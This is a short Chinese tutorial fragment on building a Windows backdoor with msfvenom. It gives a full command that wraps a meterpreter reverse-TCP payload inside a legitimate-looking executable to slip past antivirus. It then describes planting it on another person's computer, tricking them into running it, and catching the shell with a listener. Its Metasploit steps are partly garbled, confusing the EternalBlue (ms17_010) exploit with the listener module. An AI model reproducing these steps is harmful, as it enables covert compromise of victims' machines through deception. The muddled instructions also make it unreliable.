首先进行如下的操作命令:
可以直接在当前目录下生成后门程序。
别人计算机上被直接植入后面exe程序会被杀毒:
可以使用捆绑的命令-x,用来骗过部分防火墙软件。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.60.133 lport=4444 -f exe -x TxBugReport.exe -o demo.exe
成功在别人电脑上植入后门程序后,并且诱导其将exe运行后,我们可以使用远程监听模块了获取其后渗透的权限。
首先要先搜索到ms17_010永恒之蓝的漏洞,再使用其中的监听模块。
在模块中设置和后面程序一样的payload设置
比如:
set payload xxxx
set lhost xxxx
set port xxxx
然后就直接输入run命令就完事了。